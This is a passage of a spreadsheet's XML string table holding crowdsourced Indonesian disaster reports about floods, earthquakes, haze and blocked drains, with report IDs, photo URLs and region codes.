    <t>Dirumah saya setelah terjadi gempa tadi banyak retak retak halus di tembok. Barang2 rumah juga banyak yang terjatuh, pecah</t>
  </si>
  <si>
    <t>Singgit</t>
  </si>
  <si>
    <t>f49d31ae-53d2-4fcb-850b-259a3c47ac21</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f49d31ae-53d2-4fcb-850b-259a3c47ac21.jpg</t>
  </si>
  <si>
    <t>gimana cara jalannya orang saya di luar jawa</t>
  </si>
  <si>
    <t>225cf968-b83c-41c8-a7aa-f53344d43ea1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/225cf968-b83c-41c8-a7aa-f53344d43ea1.jpg</t>
  </si>
  <si>
    <t>1/2 dari warung kopi saya ambruk rata tanah</t>
  </si>
  <si>
    <t>Bulus</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/xE-iiDW99XWSKiuOa1Hc8YeA02pHCB5_BR1wNytg36N64TlojipxODmGmrWYPOgLliVTT50HfI-wpFe3F9-V08ek8f8wsbfHwY0IK5KFFeo=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2338", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir.... bagaimana mana ziarah klau pemakaman banjir kaya gitu.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/fpLJRz5My1aqS0_AMhCQuh4afFox77h2sdBKvXmoCj0RS9i3TucAb4PIuOwfappfRBYOzdj1Ojvx291x61_-S0l0K5eJaOG4e1MUV9rUxv8=s480-c</t>
  </si>
  <si>
    <t>Pak @kayuput jalan Pulomas iii dan sekitarnya di kelurahan kayu putih, air mulai meluap dan masuk rumah warga. info dari warga, tadi siang ada pasukan oranye bekerja di saluran got  jalan Pulomas iii, pas di belokan menuju Omni. Mohon dicek apakah ada ke</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Qf-rj5IhP0iP1JYDwCxeNaDPPB1hGUN2nKejBVW88dLlwl3B74BBpuk7iaN4Oe5ZPB6jmh8N-q_IwpCyDp8YAQynQsobt44c5ToWcT_-XA=s480-c</t>
  </si>
  <si>
    <t>Warga RW04 Kecamatan Makasar, keluarahan Cipinang Melayu kebanjiran, air baru datang kondisi Masih hujan #KaliMeluap #BanjirKiriman</t>
  </si>
  <si>
    <t>8562299c-8393-4fb6-aae5-79a2fda19280</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8562299c-8393-4fb6-aae5-79a2fda19280.jpg</t>
  </si>
  <si>
    <t>Banjir Di Wilayah Pesisir Kota Pekalongan Yang Diakibatkan Oleh Pasang Gelombang Air Laut</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/o4q0zraqmpvhO0R4nh-fY2oxV0XzirFXZdlc1CVBChb0cirpKAPtUq7mUM32BHgJCTl5n2B1-0ZaZC79g0yXQB2pJVts3JEAp1H_kbibemk=s480-c</t>
  </si>
  <si>
    <t>banjir lagi cidodol komplek loka permai, mohon bantuannya sebelum makin parah curah hujannya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/VpnNEf8STdiFgKDIxOeMpbUdE_yMT_KwcEhxjgNAoFd4IcOtVzdMixw-veT4rsaok5lZQI2KXktWnOet5dcK_EMZcvZPJMKk9yCq3TURkg=s480-c</t>
  </si>
  <si>
    <t>banjir lagi di jalan sd inpres rt.004/rw 002, kelurahan rambutan, kecamatan ciracas, smpe skrg blm ada solusi pencegah banjir seperti keruk kali atau buat resapan dr pemerintah. #KerukKali</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Vwz0J5CS96WCMf0un5Yv5SwqEFkyVZLNAzTaIyNKwdMGyd3zRoL42kMMo_gVd5g93Wd19U_2WpOeqcpTMEl_4SjpCDhlcl8bxhyp7vhHIw=s480-c</t>
  </si>
  <si>
    <t>Warga RT01/RT02  RW 04 Cipinang Melayu Kecamatan Makasar  kebanjiran setinggi pinggang orang dewasa. Kapan normalisasi kalinya nih  #KaliMeluap #BanjirBandang #BanjirKiriman</t>
  </si>
  <si>
    <t>6340becc-a3e2-47c6-bc54-94eb098cd160</t>
  </si>
  <si>
    <t>Banjir dah tinggi bgt iniii. Tp pompa gaada yg dikirim dari pemprov. Giliran dah surut baru dateng ni org pemprov. kirimin pompa dong</t>
  </si>
  <si>
    <t>7967938f-4ea5-43ab-801c-63ee471c90f2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7967938f-4ea5-43ab-801c-63ee471c90f2.jpg</t>
  </si>
  <si>
    <t>Pohon tumbang depan kencana loka, tidak bisa dilewati kendaraan</t>
  </si>
  <si>
    <t>Ciater</t>
  </si>
  <si>
    <t>93cbf855-d276-456e-a3eb-d2440f35f8b7</t>
  </si>
  <si>
    <t>Tidak bisa lewat</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/fQnJI1nvfvPkyrxQ7W85YNCnzD7lBIwYFCMZTOV0YyWypmSk8zjtbL3XXAjVI7tVbfpV9d5lHQCkhNGBk0yUCpdH6sE-M_8IaPFuBE3NmQ0=s480-c</t>
  </si>
  <si>
    <t>saluran  air mampet  karena  sampah tolong petugas ppsu   terimakasih</t>
  </si>
  <si>
    <t>2e268585-bdc1-4d47-b2af-9e863e009b59</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2e268585-bdc1-4d47-b2af-9e863e009b59.jpg</t>
  </si>
  <si>
    <t>Bukankn karena ketinggian lokasi kami yang rendah melainkan karena saluran pembuangan air yang tidak berfungsi dengan baik</t>
  </si>
  <si>
    <t>7066f9ef-1f03-444d-a5c5-0689eebe91b3</t>
  </si>
  <si>
    <t>5629cbfb-d832-4cbb-9eba-808c812d2415</t>
  </si>
  <si>
    <t>It says that the damage and the house cracks are not showed yet but its only says that yesterday on monday night Samosir has shaken 3 times</t>
  </si>
  <si>
    <t>Titi Rantai</t>
  </si>
  <si>
    <t>Medan Baru</t>
  </si>
  <si>
    <t>6b0562bd-3e73-4688-93f1-a8a6a794aff8</t>
  </si>
  <si>
    <t>{ "report_type": "road", "accessabilityFailure": 2, "condition": 1 }</t>
  </si>
  <si>
    <t>Terjadi bencana gempa di wilayah Sarolangun Jambi</t>
  </si>
  <si>
    <t>Sarolangun Kembang</t>
  </si>
  <si>
    <t>Sarolangun</t>
  </si>
  <si>
    <t>61eff821-b0e3-4dbe-89cf-173a9d88e1d9</t>
  </si>
  <si>
    <t>Terjadi banjir di desa samili kecematan woha kabupaten bima</t>
  </si>
  <si>
    <t>Dadibou</t>
  </si>
  <si>
    <t>dffc01d6-43ef-450b-a883-60f3a462da4d</t>
  </si>
  <si>
    <t>Terjadi angin kencang intensitas sedang di Kota Padang</t>
  </si>
  <si>
    <t>Sawahan Timur</t>
  </si>
  <si>
    <t>Padang Timur</t>
  </si>
  <si>
    <t>1e8fd1b6-5e67-4062-8150-99eaf355c261</t>
  </si>
  <si>
    <t>Terjadi banjir di kota Luwuk. Tinggi air 8cm.</t>
  </si>
  <si>
    <t>Luwuk</t>
  </si>
  <si>
    <t>1101c0f5-0a81-418b-90e8-d1230cd2cfa5</t>
  </si>
  <si>
    <t>Terjadi banjir di daerah padang selatan</t>
  </si>
  <si>
    <t>Seberang Padang</t>
  </si>
  <si>
    <t>Padang Selatan</t>
  </si>
  <si>
    <t>18dc5d6b-53c0-4b74-9e10-3abf1e28d2fc</t>
  </si>
  <si>
    <t>Tidak ada kerusakan ringan dan berat</t>
  </si>
  <si>
    <t>Karangsembung</t>
  </si>
  <si>
    <t>Nusawungu</t>
  </si>
  <si>
    <t>5702277c-23ec-46a3-a77b-37f4da8416af</t>
  </si>
  <si>
    <t>haze</t>
  </si>
  <si>
    <t>{ "report_type": "haze", "visibility": 0, "airQuality": 1 }</t>
  </si>
  <si>
    <t>Terdiam bau asap dan agak susah bernafas</t>
  </si>
  <si>
    <t>Madureso</t>
  </si>
  <si>
    <t>Dawar Blandong</t>
  </si>
  <si>
    <t>b7fcd5ae-b039-4c2a-abbb-7355da134c42</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2312", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Terjadi Banjir di Wilayah Tanah Merah Tugu Selatan</t>
  </si>
  <si>
    <t>86e295f2-ce5d-4440-8077-15fe84f0e143</t>
  </si>
  <si>
    <t>https://images.petabencana.id/86e295f2-ce5d-4440-8077-15fe84f0e143.jpg</t>
  </si>
  <si>
    <t>Banjir di Jl. Sayati Lama 50 rumah terendam</t>
  </si>
  <si>
    <t>127e8479-8f41-4bc1-8a9b-0cc6fa9f3c53</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-KU" }</t>
  </si>
  <si>
    <t>Banjir di Tarakan, Jalan Mulawarman</t>
  </si>
  <si>
    <t>Karang Anyar Pantai</t>
  </si>
  <si>
    <t>Tarakan Barat</t>
  </si>
  <si>
    <t>Tarakan</t>
  </si>
  <si>
    <t>Kalimantan Utara</t>
  </si>
  <si>
    <t>e4ff9307-b9cd-4c66-84a1-d6ccd5a0e9e8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e4ff9307-b9cd-4c66-84a1-d6ccd5a0e9e8.jpg</t>
  </si>
  <si>
    <t>Banjir yg menimpa warga tangerang</t>
  </si>
  <si>
    <t>Paninggilan Utara</t>
  </si>
  <si>
    <t>bfb72862-9e82-48b7-a8a0-657f99feff17</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bfb72862-9e82-48b7-a8a0-657f99feff17.jpg</t>
  </si>
  <si>
    <t>banjir di sekitar wilayah sangatta</t>
  </si>
  <si>
    <t>Teluk Lingga</t>
  </si>
  <si>
    <t>Sangatta Utara</t>
  </si>
  <si>
    <t>15ee63e6-43ff-4552-80f6-e5e177d174ea</t>
  </si>
  <si>
    <t>https://images.petabencana.id/15ee63e6-43ff-4552-80f6-e5e177d174ea.jpg</t>
  </si>
  <si>
    <t>Hujan disertai angin kencang</t>
  </si>
  <si>
    <t>Sumurpanggang</t>
  </si>
  <si>
    <t>Margadana</t>
  </si>
  <si>
    <t>Tegal</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/GB9dwLszWZJavK5nf3AAnRdsNsDXRZXdNtQ9q4_I7Qd98dYcamsbLtX_feCBDswYUud2W7WHQ2DRBS2UdXIYljev5AJEwKWVnPAN93f-=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap tidak pernah Ada solusinya #DanaBikinGorong?Diprioritasnya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/bAwck8vXe2RHCOSDwgk3uqvAxsR934Zwg7XuO2m3vyJHA1p2mTMv4-8-9d4zNQC1Af5uEaMyLUNs9oqWXmvZLwXXjxVb3Gx2xrGRayiWAwU=s480-c</t>
  </si>
  <si>
    <t>mana solusinya, masa tiap Hujan besar banjir terus ! #Butuh Gorong?</t>
  </si>
  <si>
    <t>03d915fb-7ace-4ad0-be5a-487483ba9c2a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/03d915fb-7ace-4ad0-be5a-487483ba9c2a.jpg</t>
  </si>
  <si>
    <t>Evakuasi Mandiri ditempat yang aman disekitar rumah dengan berlindung di bawah meja/tempat tidur yang dianggap kuat atau mampu melindungi</t>
  </si>
  <si>
    <t>Cibabat</t>
  </si>
  <si>
    <t>Cimahi Utara</t>
  </si>
  <si>
    <t>3985b570-6c95-44b9-8afd-14dddf2feb97</t>
  </si>
  <si>
    <t>Banjir KArena Hujan</t>
  </si>
  <si>
    <t>6c4d02e3-28bf-4340-90da-d276cef34c08</t>
  </si>
  <si>
    <t>Gempa sebentar banget, ga semua orang nyadar</t>
  </si>
  <si>
    <t>Jatikarya</t>
  </si>
  <si>
    <t>Jatisampurna</t>
  </si>
  <si>
    <t>184bd777-4cb7-41c3-9ee4-d55665bbb72b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/184bd777-4cb7-41c3-9ee4-d55665bbb72b.jpg</t>
  </si>
  <si>
    <t>sebagian rumah retak retak Terutama dibagian bukaan/Jendela</t>
  </si>
  <si>
    <t>Jampang Kulon</t>
  </si>
  <si>
    <t>bcc1ea9a-00e9-426f-9d46-85b6dde84dcb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bcc1ea9a-00e9-426f-9d46-85b6dde84dcb.jpg</t>
  </si>
  <si>
    <t>Dua rumah ambruk di Kampung Linggaresmi RT 05/04 Bantargadung, Kabupaten Sukabumi,</t>
  </si>
  <si>
    <t>Bantargadung</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/1cj7O1t85DkEYHqVH4TXKWR4HbV5skiSO-ThwGnSy1eNTkICbm06ZcMjQqm6cYFLuPTJz-PKptquYZm9L5bK9Tcf0lAeomnnHJ8JXSH7MQ=s480-c</t>
  </si>
  <si>
    <t>Hujan sore hari Warga RT 01/RW 04 Kecamatan Makasar,  Kelurahan Cipinang Melayu kembali kebanjiran #KaliMeluap #BanjirKiriman</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/7vetrnW834QgFxuGGI93iCGxPhcO6MITgETi_ahV8ixbdigg8gIxAq0_Nb-n4dWUTbWyRamISRxNmoNfwSxNNpcb9YyTWpADEVagACN_Ag=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap tolong TL banjir</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ermAkvRqw_c-TIPnj-ulK0LQY-AEEIG0PHsF7v26e-Tq8w5UJJaXISZGYvbeE9tm3ujqExwFxzJ_poA3-z6LA1j-eRPm6JDjTCrO4i6MAw=s480-c</t>
  </si>
  <si>
    <t>banjir tolong Tl dimana2 tdk baniir .tl serius</t>
  </si>
  <si>
    <t>8ba4d698-cc52-4e9e-a944-bf88e2ddde7f</t>
  </si>
  <si>
    <t>Jalanan rusak berair</t>
  </si>
  <si>
    <t>Jalan Kereta Api</t>
  </si>
  <si>
    <t>Pariaman Tengah</t>
  </si>
  <si>
    <t>Pariaman</t>
  </si>
  <si>
    <t>d74505e7-6e35-4c5e-aa2d-98310f009b06</t>
  </si>
  <si>
    <t>Jalanan rusak berair dan berlubang</t>
  </si>
  <si>
    <t>Taratak</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/DOx-VPaohUkuJkOY3IppXPCSSUtApT4JZTZi6eUbGBJdLuaGU3eCQJG2jgnA4toIAG8WrirccdLmzLYz9-2li61cURIA2WCzBizqzoaUBQ=s480-c</t>
  </si>
  <si>
    <t>tidak ada drainase... membuat jalan rusak</t>
  </si>
  <si>
    <t>a096a7b1-3e81-4945-98cd-c9b29a0d9e0d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a096a7b1-3e81-4945-98cd-c9b29a0d9e0d.jpg</t>
  </si>
  <si>
    <t>e3dee0a6-9dab-43b5-9ed6-f8a7ccaece93</t>
  </si>
  <si>
    <t>b4e7ab94-72a1-4cca-a8d0-ab53188a36b2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b4e7ab94-72a1-4cca-a8d0-ab53188a36b2.jpg</t>
  </si>
  <si>
    <t>Banjir kiriman dari sungai cileungsi Daerah sini tidak hujan tapi malamnya banjir Dan selalu terjadi tiap tahun</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/359174</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/05/06/359174-1620319415519346105.mp4-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1716", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Hujan Lebat, Perumahan Jatiwaringin Antilop Tergenang Air</t>
  </si>
  <si>
    <t>Diguyur hujan lebat hari ini, perumahan Jatiwaringin Antilop Kota Bekasi tergenang banjir.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/r2f5TruVjDtGOot4Jbtr1fGU8Wk49dOo0_PP54xqj3EZjxHecg92K83rrIQQ4irFx7wMt9t1ts87Ff-Td6-EqRwyy6J0HkT_aTuYmNY_kw=s480-c</t>
  </si>
  <si>
    <t>Tolong sampahnya bisa mengganggu dan bau busuk.</t>
  </si>
  <si>
    <t>1d406b8e-4edc-4264-b6b1-97b9c850f733</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1d406b8e-4edc-4264-b6b1-97b9c850f733.jpg</t>
  </si>
  <si>
    <t>Tideng Pale</t>
  </si>
  <si>
    <t>Sesayap</t>
  </si>
  <si>
    <t>Tana Tidung</t>
  </si>
  <si>
    <t>678ca8b7-74ae-4b4d-ae35-ea81b8321a2d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/678ca8b7-74ae-4b4d-ae35-ea81b8321a2d.jpg</t>
  </si>
  <si>
    <t>banjir di ciparigi</t>
  </si>
  <si>
    <t>Ciluar</t>
  </si>
  <si>
    <t>Bogor Utara</t>
  </si>
  <si>
    <t>0123c36b-ac9d-4144-9a5d-1e8fe299acc6</t>
  </si>
  <si>
    <t>Banjir pada 14 Mei 2021 tengah malam hingga 15 Mei 2021. Beberapa rumah terendam banjir. Banjir juga terjadi hampir di sepanjang sungai Kela"</t>
  </si>
  <si>
    <t>Long Lanuk</t>
  </si>
  <si>
    <t>Sambaliung</t>
  </si>
  <si>
    <t>Berau</t>
  </si>
  <si>
    <t>5730eee1-cf4f-4fac-9a67-230e7f5fe18d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5730eee1-cf4f-4fac-9a67-230e7f5fe18d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "773", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di panton bilie kec, pasie raja, kab Aceh Selatan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/7aoVV3ZPH-5XqYjg-pcKegPC3jh2GE37HcLD51Xzihur_8xcv0VnYZ7XxOMkUpVjht4kCk4-lHieaxSPt_qzBUkVLqZnAEvZ35rXpHAG=s480-c</t>
  </si>
  <si>
    <t>banjir RT 20 RW 17 penjaringan jakut</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/FfGi0eiaS5KvXCLhN62Ed4BCHPnA9Vgxmw6LUsRjRg9Lhx2ntQm7wav6DvOfLr1bS8XYkhTi-_0Pfn6KafoTFaiwzd9MU7GN_70aFgXU=s480-c</t>
  </si>
  <si>
    <t>tolong pa seger di perbaiki , saluran kurang baik . setiap hujan selalu terjadi banjir . di wilayah penjaringan muara baru RT 20 RW 17 . are gang ketoprak.m</t>
  </si>
  <si>
    <t>68a697b8-690d-4259-ba70-03ea184a4132</t>
  </si>
  <si>
    <t>https://images.petabencana.id/68a697b8-690d-4259-ba70-03ea184a4132.jpg</t>
  </si>
  <si>
    <t>Gang kramat, kelurahan ulujami, kecamatan pesanggrahan</t>
  </si>
  <si>
    <t>883b8de2-353a-4b6f-995c-b9207129b9a8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/883b8de2-353a-4b6f-995c-b9207129b9a8.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2700", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Swadarma Utara 6 sudah banjir</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/1OUgmRdQSWbPtu30gelymJOJDxiYyuhcqS2RCTQXoQmRTHj--ta64OSutnNAw6odO7rzAzvsjvNitTrXXsyS-sV-6185XJDOB_o-nmR2WQ=s480-c</t>
  </si>
  <si>
    <t>banjir akibat hujan deras dari senin hingga dinihari</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/xBbDUEUGkHRNcKOtnfNl9tB1xqsqWkU0SO21lHsVc9XTpiVyQKEj9daFQg-xik__KlcQ-qhcLNdZn_WOssDxKgipKmyANDZ-KVo53fuA=s480-c</t>
  </si>
  <si>
    <t>Rt.01 rt.02 rt.08 rt.09 rw 17 muara baru gang marlina</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/O1dqoewtSe1qr3wByLpOG1LEAk77SbL6724IM1ZyRlKexLDMrAdqZrdjZgk4KyzwBCEmzAHXrNE5piS_KxrWVq8p2BwcBaA9oa4Xtpatdw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2290", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>28791717-4bb0-4ade-ac04-126395cdc7d3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/28791717-4bb0-4ade-ac04-126395cdc7d3.jpg</t>
  </si>
  <si>
    <t>Banjir daerah Kutai timur, Muara Wahau</t>
  </si>
  <si>
    <t>Kongbeng</t>
  </si>
  <si>
    <t>3627a24a-c45e-4459-89e4-377e1db5228b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3627a24a-c45e-4459-89e4-377e1db5228b.jpg</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/wdM5_GDI5ZlZuxi6QY3fjnB2JoLSgA_WCGZPU_B4ul14L1D55z6nmWPS6g0GHaJ9dfFvMce4cHv0naU3sShofWjFrU8f2O-5_GVwPc6ETQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "90", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>minta tolong pasukan orange nya,,,saluran air penuh,,,mampet banyak lumpurnya,,,...</t>
  </si>
  <si>
    <t>2f0d5a94-99cc-4e1d-8bf2-193f27e0013c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2f0d5a94-99cc-4e1d-8bf2-193f27e0013c.jpg</t>
  </si>
  <si>
    <t>Banjir di Komplek Sangrila Indah 2, Kel. Petukangan Selatan, Kec. Pesanggrahan, Jaksel, masuk ke rumah2 warga</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/xNi1qWeamlAps2iZ5mWK6NOyFFLefTXTaYB3-KsHGD1cvIlVIq77UiVcN_GMtUJ-k13mYbAZUq6KK7Qg9r1EkHWuwuOOo_IYeMzBnVWd=s480-c</t>
  </si>
  <si>
    <t>banjir di komplek unilever rt 05 / rw 09, meruya selatan. disebabkan oleh adanya bangunan liar permanen yg berdiri di atas saluran pembuangan air/ selokan satu2 nya yang dibangun oleh salah satu oknum warga di dekat sdn04. mohon kiranya bangunan ilegal"</t>
  </si>
  <si>
    <t>a89b4a99-51fe-4d11-8799-cb8ee4699564</t>
  </si>
  <si>
    <t>Baik-baik saja</t>
  </si>
  <si>
    <t>Trawas</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/HRdKMS90GVFo0jqcYes9HgD0mrIcSMJ33MjFm7w3lsEtihnVbGAvEkIclRY5dzBDGMNRk4kQCbCz3vhhINHrp2PTJX3OdRKatMS3tMtfRw=s480-c</t>
  </si>
  <si>
    <t>mulai banjir.. tolong pompa dinyalakan..</t>
  </si>
  <si>
    <t>d8782134-66f5-4460-9b1d-ab42bc2c420d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d8782134-66f5-4460-9b1d-ab42bc2c420d.jpg</t>
  </si>
  <si>
    <t>Jatipadang 3, gang h. Saiman RT 08 RW 05 terdampak banjir dari sore hari setinggi paha oranf dewasa,mohon respon dan tanggapannya agar surut</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/SmRSxwiKZ_VQeYC4M2Y7op1nOMFjxWc8MjmZBD5DaNEJv87cQDBHKntUM5uNH19ryX1ElUxJbWuYsM1BB_Jpp_z26vPjQttR5lJToLdD14A=s480-c</t>
  </si>
  <si>
    <t>Hujan sebentar Warga RT01 RW 04 Kel Cipinang Melayu Kec Makasar Jakarta Timur kebanjiran</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/FWYbV2u3VzVYPJw97_myvCAiSy7fvN0JMCGFC6Ia3y-hbhjQiLmeBpSy9tQseY6HOK5v2Yoi5E_rtOeJWS6Ln-7g6P56QeuehhJJ-LwjJw=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil tlong pra petugas pintu air ya di buka jgn ditutup mulu kami warga sanggrahan kembangan  rt. 02/09 kebanjiran trus tiap hujan turun dikit</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/7bMYtxNdIm_vGH0VaifYBnhby5A6ETcMlwZ3OWC5ya6uyZHrsKl5S77-Sg9FH5NScUlFG_OvXRnxZFa4Rrp6GPIftqkKGFzG8HXAPUQwng=s480-c</t>
  </si>
  <si>
    <t>#SaluranTersumbat #SaluranKotor #KaliKotor #KerukKali #SampahDiSaluran</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/IVV6HZBNjHvT99QuMhGLpaTBs0Y3DLr8hPhT-e9Xw_HeGoCmT2XvP1oYgt6OmRIZzs95RSqzxazMF4Qg1qM46rALgtkBtrsNe0BZFTCnRA=s480-c</t>
  </si>
  <si>
    <t>banjir lagi di jalan sd inpres, kelurahan rambutan, kecamatan ciracas, jakarta timur, sampai sekarang tidak ada tindakan dari pemerintah untuk antisipasi banjir seperti keruk kali atau buat resapan. #KerukKali</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/dNpTZJbcdG9d__YgXJgSfRVSU3h4khYwq0xwMT56enNq5mZIuiSoMm_rrsw6RycyjDPlqoq3lYdi0aIT35OgV4XYXTcKdSbvJ62Oy4Bkgg=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2091", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>genangan air di dekat halte busway lampu merah jalan pemuda tolong kepada petugas PPSU segera di TL karena sangat menggangu</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/f9LEXetVNVQqtqYRfRKeixt6WU3dV0_fA_kzecNhUW33CcDAWcjju9fclJHz9DFuImWLYxZJEPmQd2E0vaOh_3H2v5rm-gxKPw87I54d54w=s480-c</t>
  </si>
  <si>
    <t>#SaluranTersumbat. hujan sebentar langsung banjir. luapan air got, bau. biasanya saluran got utama dibelakang tersumbat. mohon respon pihak terkait.</t>
  </si>
  <si>
    <t>5ec98365-a397-4a5d-bf29-fb1472acaa06</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5ec98365-a397-4a5d-bf29-fb1472acaa06.jpg</t>
  </si>
  <si>
    <t>banjir daerah rancaekek - majalaya kadang jika turun hujannya begitu deras bisa sampai sepaha orang dewasa atau bahkan masuk rumah</t>
  </si>
  <si>
    <t>Rancaekek Kulon</t>
  </si>
  <si>
    <t>5c09aec7-df9c-4706-89f0-515fee9c37dd</t>
  </si>
  <si>
    <t>Tiap hujan banjir, hr ini air banjirnya hitaaaaam</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/b-kV8UYfP62t03y1tbdKN0cPBA707ENCzqB4a8sgVD9vHNjYkCrEb7QxaCajuZdpk5MHmmficqJfKvO9fOZ5XNevMHB-p1_hYkZL3lPhFfQ=s480-c</t>
  </si>
  <si>
    <t>pondasi tanggul yg rusak</t>
  </si>
  <si>
    <t>619b160d-60d4-425b-9354-dda0b710836f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/619b160d-60d4-425b-9354-dda0b710836f.jpg</t>
  </si>
  <si>
    <t>Sukabumi digetarkan gempa Mag:3.0 Kedlmn 3 Km, diduga dipicu aktivitas Cimandiri menyebabkan rumah retak-retak di kec.Cireunghas Kab.Sukabum</t>
  </si>
  <si>
    <t>Cireunghas</t>
  </si>
  <si>
    <t>8e68592d-12d2-40ac-8850-a1597da55144</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8e68592d-12d2-40ac-8850-a1597da55144.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "road", "accessabilityFailure": 4, "condition": 1 }</t>
  </si>
  <si>
    <t>Tiap hari banjir rob, rob mulai masuk saat siang sampe malam.</t>
  </si>
  <si>
    <t>Bandengan</t>
  </si>
  <si>
    <t>a7dd0793-43c7-45c7-ab6a-8f09c976421c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a7dd0793-43c7-45c7-ab6a-8f09c976421c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1510", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Hujan deras tidak berhenti, air mulai meluap ddan masuk rumah warga</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/CPj6Dz3qPzV4_hrXmxsNzQk3eYSPzCA5xehUEQeNJGozOf5yNKK6GVF8-yISEALVMHK7RaH0O55PM1wR2YpgZ3-eXOzn749-6W2unKBw-A=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "894", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banyaknya warga setempat yang membuang sampah ke kali yang bisa menyebab kan banjir apabila hujan. mohon untuk di lakukan pembersihan kali secara berkala oleh petugas yang berwenang dan untuk petugas rt rw setempat agar memberikan himbauan kepada warga a</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/359681</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/06/10/1623342674411666785.jpg</t>
  </si>
  <si>
    <t>Ini Penyebab Banjir Perumahan Ciputat Baru, Sampai Kapan?</t>
  </si>
  <si>
    <t>Setiap hujan deras sebentar, Perumahan Ciputat Baru selalu banjir. Permasalahn hanya dipintu air. Banjir dr tahun 90 sampai sekarang masalahnya sama.. mau sampai kapan?"</t>
  </si>
  <si>
    <t>fe1f4a85-8045-49ca-b0aa-104a84c2c3b6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fe1f4a85-8045-49ca-b0aa-104a84c2c3b6.jpg</t>
  </si>
  <si>
    <t>Banjir didaerah SPBU Jatimulya. Masih bisa dilalui namun lalu lintas sangat padat. bagi yang ingin melintas harap hati hati"</t>
  </si>
  <si>
    <t>ab012a4e-9e49-46c9-b557-1b3d732e1296</t>
  </si>
  <si>
